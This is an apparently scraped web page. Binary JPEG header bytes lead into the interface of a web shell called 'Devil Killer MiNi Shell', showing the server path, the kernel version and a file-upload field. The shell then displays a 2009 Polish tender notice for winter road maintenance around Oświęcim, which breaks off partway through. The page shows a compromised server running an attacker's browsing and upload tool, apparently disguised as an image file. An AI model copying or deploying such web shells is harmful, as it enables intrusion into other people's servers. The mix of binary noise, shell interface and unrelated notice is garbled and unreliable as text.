JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090923/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090923/162035-N-2009.html

<p class="kh_header"><b>Oświęcim: Kompleksowe zimowe utrzymanie dróg powiatowych na terenie Powiatu Oświęcimskiego w sezonie 2009/2010   z podziałem na 4  zadania:
a)	Zadanie Nr 1  - teren gmin: Zator, Przeciszów, Polanka Wielka na łącznej długości 34,5 km, 
b)	Zadanie Nr 2  -  teren gminy Oświęcim na długości  43,7 km.
c)	Zadanie Nr 3 - teren gminy Kęty na długości 23,5 km
d)	Zadanie Nr 4  - teren miasta i gminy Brzeszcze na długości  30,3 km.</b><br>
<b>Numer ogłoszenia: 162035 - 2009; data zamieszczenia: 23.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Oświęcimiu , ul. Stanisławy Leszczyńskiej 12, 32-600 Oświęcim, woj. małopolskie, tel. 033 8430622, faks 033 8433593.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> nie dotyczy</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe zimowe utrzymanie dróg powiatowych na terenie Powiatu Oświęcimskiego w sezonie 2009/2010   z podziałem na 4  zadania:
a)	Zadanie Nr 1  - teren gmin: Zator, Przeciszów, Polanka Wielka na łącznej długości 34,5 km, 
b)	Zadanie Nr 2  -  teren gminy Oświęcim na długości  43,7 km.
c)	Zadanie Nr 3 - teren gminy Kęty na długości 23,5 km
d)	Zadanie Nr 4  - teren miasta i gminy Brzeszcze na długości  30,3 km..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest  świadczenie usług związanych z kompleksowym  zimowym utrzymaniem dróg powiatowych na terenie powiatu oświęcimskiego wg 4 zadań ( w skrócie ZUD),  a w szczególności przejęcie na siebie obowiązku utrzymania przejezdności dróg, zmniejszenia lub ograniczenia zakłóceń ruchu drogowego wywołanego czynnikami atmosferycznymi, poprzez:
   - odśnieżanie dróg- ulic przy użyciu pługów odśnieżnych,
   - likwidację śliskości zimowej, gołoledzi przy użyciu piaskarek, ewentualnie rozrzutników    rolniczych (na chodnikach), własnym materiałem: solą, mieszanką lub materiałem uszorstniającym,
               - zmagazynowanie materiałów do zwalczania  śliskości,
   - załadunek materiałów do zimowego utrzymania dróg,
   - przekazywanie informacji o stanie dróg do ZDP Oświęcim,
   - inne czynności w razie klęsk żywiołowych,
  
2.	Będą to usługi związane z likwidacją skutków zimy, żywiołu śnieżnego i skutków obniżonej temperatury w taki  sposób aby poprawić przejezdność  dróg i ograniczyć  zakłócenia ruchu drogowego wywołane czynnikami atmosferycznymi.
3.	Termin  realizacji zamówienia (tj. zadania: Nr 1, 2, 3, 4 )  -  w sezonie zimowym 2009/2010       -  do 15.05.2010r.      (tj. orientacyjnie: zimowe utrzymanie w okresie od 01 listopada 2009r.  do 31 marca 2010r, a dyspozycyjność do 15 kwietnia 2010r. oraz  do dnia 15 maja 2010r. wykonanie czyszczenia jezdni i studzienek ściekowych);  przy czym  sezon zimowy rozpoczyna się z chwilą  wystąpienia niekorzystnych warunków atmosferycznych  (opady śniegu  lub gołoledź) lub wezwania do robót przy zimowym utrzymaniu dróg, a zakończenie z chwilą całkowitego ustąpienia zimy. 
4.	Po zakończeniu prac zimowego utrzymania dróg   w okresie do 15 maja 2010r. zalegający przy krawędziach jezdni i wzdłuż chodników  materiał uszorstniający  musi zostać uprzątnięty, a zatkane kratki ściekowe oraz przykanaliki muszą być oczyszczone..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.21.20.00-6, 90.21.30.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  O udzielenie zamówienia ubiegać się mogą Wykonawcy składający ważną i odpowiednią ofertę oraz:  
a)  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, a w szczególności: 
(1) wykażą, że wykonali w ciągu ostatnich trzech  lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno zamówienie o wartości min. 100.000 zł  brutto w zakresie usług odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia   z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że usługi   te zostały wykonane należycie,
(2)	dysponują  osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia 
(3)	 dysponują  lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia    jednostek  sprzętowych niezbędnych do wykonania zamówienia tj.:   
1)	Zadanie Nr 1 - teren gmin: Zator, Przeciszów, Polanka Wielka
    - Pługo - piaskarka  - 1 szt
    - Pług  ciężki   - 1 szt
                       2)  Zadanie Nr 2 - teren gminy Oświęcim
      - Pługo - piaskarka  - 1 szt
      - Pług  ciężki   - 1 szt
                       3)  Zadanie Nr 3 - teren gminy Kęty
                                   - Pługo - piaskarka  - 1 szt
      - Pług  ciężki   - 1 szt
                        4)  Zadanie Nr 4 - teren  miasta i gminy Brzeszcze
                                   - Pługo - piaskarka  - 1 szt
      - Pług  ciężki   - 1 szt

  c)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. 
            -    posiadają  ubezpieczenie  od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej,
    d)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z  art. 24 ust. 1 i 2 PZP,
e)	Zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w § 1 ust. 1 pkt. 2,3,  ust. 2 pkt. 2,3,3a,5,5a  oraz ust. 3 pkt. 3  Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane. (Dz.U. Nr 87 z dnia 24 maja 2006r. poz. 605).

2.  Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty na zasadzie spełnia / nie spełnia.
3. Niespełnienie przez Wykonawcę chociażby jednego  warunku spowoduje wykluczenie Wykonawcy z postępowania.   Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.

2.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia ( pn. w  konsorcjum). W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego,  a jego pełnomocnictwo musi być podpisane przez uprawnionych przedstawicieli wszystkich pozostałych wykonawców. Przedmiotowe pełnomocnictwo musi zostać dołączone do oferty w oryginale lub odpisie potwierdzonym notarialnie.   Wykonawcy wspólnie ubiegający się o zamówienie, ponoszą solidarną odpowiedzialność za wykonanie umowy. 
3.	Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Wykonawca przed zawarciem umowy w sprawie zamówienia publicznego przedstawi  umowę regulującą współpracę wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia  spełnienia warunków udziału w postępowaniu  Wykonawca  składa dla każdego zadania oddzielnie następujące  dokumenty i oświadczenia:
1.	Formularz oferty  - wg   załącznika Nr 2 a-d do SIWZ.
2.	Pełnomocnictwo dla pełnomocnika ustanowionego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego. 
3.	Pełnomocnictwo do sporządzenia i podpisania oferty, jeżeli ofertę podpisuje osoba upoważniona przez osobę lub osoby uprawnione do reprezentowania firmy w sposób określony w akcie rejestrowym.
4.	Przedmiotowe pełnomocnictwa muszą zostać dołączone do oferty w oryginale lub odpisie potwierdzonym notarialnie.  
5.	W przypadku, gdy składający ofertę są wspólnikami spółki cywilnej do oferty należy dołączyć kserokopie umowy spółki.
6.	Oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych w   art. 22 ust. 1 i art. 24 ust. 1i2   ustawy Prawo zamówień publicznych - wg  załącznika Nr 3 do SIWZ. 
7.	Zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w § 1 ust. 1 pkt. 2,3, ust. 2 pkt. 2,3,3a,5,5a, oraz ust. 3 pkt. 3  Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane. (Dz.U. Nr 87,  poz. 605z późn. zm.).
a)	Aktualnego  odpisu z  właściwego rejestru albo aktualnego  zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 m-cy  przed upływem terminu składania ofert. 
b)	Aktualne zaświadczenie  właściwego Naczelnika Urzędu Skarbowego  potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 m-ce przed upływem terminu składania ofert. 
c)	Aktualne zaświadczenie właściwego oddziału ZUS   lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca  nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że  uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 m-ce przed upływem terminu składania ofert. 
d)	Wykaz zrealizowanych zamówień wykonanych  w ciągu ostatnich  trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie   - wg załącznika Nr 4a-d do SIWZ.
e)	Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą  uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych -  wg załącznika Nr 5a-d do SIWZ.     W przypadku korzystania przez Wykonawcę z  osób  od innego  podmiotu do wykazu należy dołączyć  pisemne zobowiązanie tych podmiotów do udostępnienia osób zdolnych  do wykonania zamówienia.
f)	Wykaz  narzędzi  i urządzeń (sprzętu technicznego), którymi dysponuje lub będzie dysponował  Wykonawca  wg załącznika Nr 6a-d do SIWZ.  W przypadku korzystania przez Wykonawcę z  sprzętu od innych podmiotów do wykazu należy dołączyć  pisemne zobowiązanie tych podmiotów do udostępnienia niezbędnych  narzędzi i urządzeń do wykonania zamówienia.
g)	Polisę lub inny dokument  ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie  prowadzonej działalności gospodarczej.
8.	Oświadczenie Wykonawcy, że zadanie będzie wykonane w całości siłami własnymi lub wykaz  zakresu  prac  przewidziany do powierzenia podwykonawcom   - wg załącznika Nr 7a-d do SIWZ.
9.	Wzór umowy wg zał. Nr 8a-d do SIWZ  - zaakceptowany przez osobę lub osoby upoważnione do reprezentowania podmiotu  składającego ofertę.
10.	Kalkulację ceny  sporządzoną na podstawie załączonych przedmiarów  (Zał. Nr 1a-d )  podpisaną  przez osobę lub osoby upoważnione do reprezentowania podmiotu  składającego ofertę. 
11.	Zgodnie z art. 23 ust.1 PZP Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia. 
12.	W w/w przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich 
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy  w sprawie zamówienia publicznego, a jego pełnomocnictwo musi być podpisane przez uprawnionych przedstawicieli wszystkich pozostałych wykonawców. Przedmiotowe pełnomocnictwo musi zostać dołączone do oferty w oryginale lub odpisie potwierdzonym notarialnie.     
13.	W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, dokumenty wymienione w punkcie 7 a-c   winien dołączyć każdy podmiot występujący wspólnie.
14.	Jeżeli Wykonawca nie złoży wymaganych dokumentów i oświadczeń lub nie spełni jednego bądź więcej warunków, jego oferta zostanie odrzucona lub Wykonawca zostanie wykluczony z postępowania. Zgodnie z art. 24 ust. 4 ustawy ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
15.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, w miejsce dokumentów, o których mowa w pkt. 7 a,b,c  zobowiązany jest przedłożyć dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości, - wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert
b)	nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 m-ce przed upływem terminu składania ofert. 
16.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się powyższych dokumentów, Wykonawca może je zastąpić stosownym dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
17.	Dokumenty, o których mowa w pkt. 15 i 16 i  sporządzone w języku obcym Wykonawca składa wraz z tłumaczeniem na język polski; tłumaczenie musi być sporządzone  przez tłumacza przysięgłego.
18.	Dostarczane dokumenty ( za wyjątkiem pełnomocnictw oraz załączników od Nr 2 do 8 do SIWZ, które są składane tylko w oryginale)  mogą być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu w przypadku, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna  lub budzi wątpliwości co do jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdp@powiat.oswiecim.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Oświęcimiu, ul. St. Leszczyńskiej 12, 32-600 Oświęcim,  -  pok. Nr 6.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.10.2009 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Oświęcimiu, ul. St. Leszczyńskiej 12, 32-600 Oświęcim,  -  sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kompleksowe zimowe utrzymanie dróg powiatowych na terenie Powiatu Oświęcimskiego w sezonie 2009/2010   - Zadanie Nr 1  - teren gmin: Zator, Przeciszów, Polanka Wielka na łącznej długości 34,5 km,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest  świadczenie usług związanych z kompleksowym  zimowym utrzymaniem dróg powiatowych na terenie gminy Zaror, Przeciszów i Polanka Wielka (zwane w skrócie ZUD),  a w szczególności przejęcie na siebie obowiązku utrzymania przejezdności dróg, zmniejszenia lub ograniczenia zakłóceń ruchu drogowego wywołanego czynnikami atmosferycznymi, poprzez:
   - odśnieżanie dróg- ulic przy użyciu pługów odśnieżnych,
   - likwidację śliskości zimowej, gołoledzi przy użyciu piaskarek, ewentualnie rozrzutników    rolniczych (na chodnikach), własnym materiałem: solą, mieszanką lub materiałem uszorstniającym,
               - zmagazynowanie materiałów do zwalczania  śliskości,
   - załadunek materiałów do zimowego utrzymania dróg,
   - przekazywanie informacji o stanie dróg do ZDP Oświęcim,
   - inne czynności w razie klęsk żywiołowych,
  
2.	Będą to usługi związane z likwidacją skutków zimy, żywiołu śnieżnego i skutków obniżonej temperatury w taki  sposób aby poprawić przejezdność  dróg i ograniczyć  zakłócenia ruchu drogowego wywołane czynnikami atmosferycznymi.
3.	Termin  realizacji zamówienia dla zadania: Nr 1  -  w sezonie zimowym 2009/2010       -  do 15.05.2010r.      (tj. orientacyjnie: zimowe utrzymanie w okresie od 01 listopada 2009r.  do 31 marca 2010r, a dyspozycyjność do 15 kwietnia 2010r. oraz  do dnia 15 maja 2010r. wykonanie czyszczenia jezdni i studzienek ściekowych);  przy czym  sezon zimowy rozpoczyna się z chwilą  wystąpienia niekorzystnych warunków atmosferycznych  (opady śniegu  lub gołoledź) lub wezwania do robót przy zimowym utrzymaniu dróg, a zakończenie z chwilą całkowitego ustąpienia zimy. 
4.	Po zakończeniu prac zimowego utrzymania dróg   w okresie do 15 maja 2010r. zalegający przy krawędziach jezdni i wzdłuż chodników  materiał uszorstniający  musi zostać uprzątnięty, a zatkane kratki ściekowe oraz przykanaliki muszą być oczyszczone..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.21.20.00-6, 90.21.30.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kompleksowe zimowe utrzymanie dróg powiatowych na terenie Powiatu Oświęcimskiego w sezonie 2009/2010  - Zadanie Nr 2  -  teren gminy Oświęcim na długości  43,7 km..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest  świadczenie usług związanych z kompleksowym  zimowym utrzymaniem dróg powiatowych na terenie gminy Oświęcim ( w skrócie ZUD),  a w szczególności przejęcie na siebie obowiązku utrzymania przejezdności dróg, zmniejszenia lub ograniczenia zakłóceń ruchu drogowego wywołanego czynnikami atmosferycznymi, poprzez:
   - odśnieżanie dróg- ulic przy użyciu pługów odśnieżnych,
   - likwidację śliskości zimowej, gołoledzi przy użyciu piaskarek, ewentualnie rozrzutników    rolniczych (na chodnikach), własnym materiałem: solą, mieszanką lub materiałem uszorstniającym,
               - zmagazynowanie materiałów do zwalczania  śliskości,
   - załadunek materiałów do zimowego utrzymania dróg,
   - przekazywanie informacji o stanie dróg do ZDP Oświęcim,
   - inne czynności w razie klęsk żywiołowych,
  
2.	Będą to usługi związane z likwidacją skutków zimy, żywiołu śnieżnego i skutków obniżonej temperatury w taki  sposób aby poprawić przejezdność  dróg i ograniczyć  zakłócenia ruchu drogowego wywołane czynnikami atmosferycznymi.
3.	Termin  realizacji zamówienia dla  zadania: Nr  2   -  w sezonie zimowym 2009/2010       -  do 15.05.2010r.      (tj. orientacyjnie: zimowe utrzymanie w okresie od 01 listopada 2009r.  do 31 marca 2010r, a dyspozycyjność do 15 kwietnia 2010r. oraz  do dnia 15 maja 2010r. wykonanie czyszczenia jezdni i studzienek ściekowych);  przy czym  sezon zimowy rozpoczyna się z chwilą  wystąpienia niekorzystnych warunków atmosferycznych  (opady śniegu  lub gołoledź) lub wezwania do robót przy zimowym utrzymaniu dróg, a zakończenie z chwilą całkowitego ustąpienia zimy. 
4.	Po zakończeniu prac zimowego utrzymania dróg   w okresie do 15 maja 2010r. zalegający przy krawędziach jezdni i wzdłuż chodników  materiał uszorstniający  musi zostać uprzątnięty, a zatkane kratki ściekowe oraz przykanaliki muszą być oczyszczone..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.21.20.00-6, 90.21.30.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kompleksowe zimowe utrzymanie dróg powiatowych na terenie Powiatu Oświęcimskiego w sezonie 2009/2010  - Zadanie Nr 3 - teren gminy Kęty na długości 23,5 km.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest  świadczenie usług związanych z kompleksowym  zimowym utrzymaniem dróg powiatowych na terenie gminy Kęty ( w skrócie ZUD),  a w szczególności przejęcie na siebie obowiązku utrzymania przejezdności dróg, zmniejszenia lub ograniczenia zakłóceń ruchu drogowego wywołanego czynnikami atmosferycznymi, poprzez:
   - odśnieżanie dróg- ulic przy użyciu pługów odśnieżnych,
   - likwidację śliskości zimowej, gołoledzi przy użyciu piaskarek, ewentualnie rozrzutników    rolniczych (na chodnikach), własnym materiałem: solą, mieszanką lub materiałem uszorstniającym,
               - zmagazynowanie materiałów do zwalczania  śliskości,
   - załadunek materiałów do zimowego utrzymania dróg,
   - przekazywanie informacji o stanie dróg do ZDP Oświęcim,
   - inne czynności w razie klęsk żywiołowych,
  
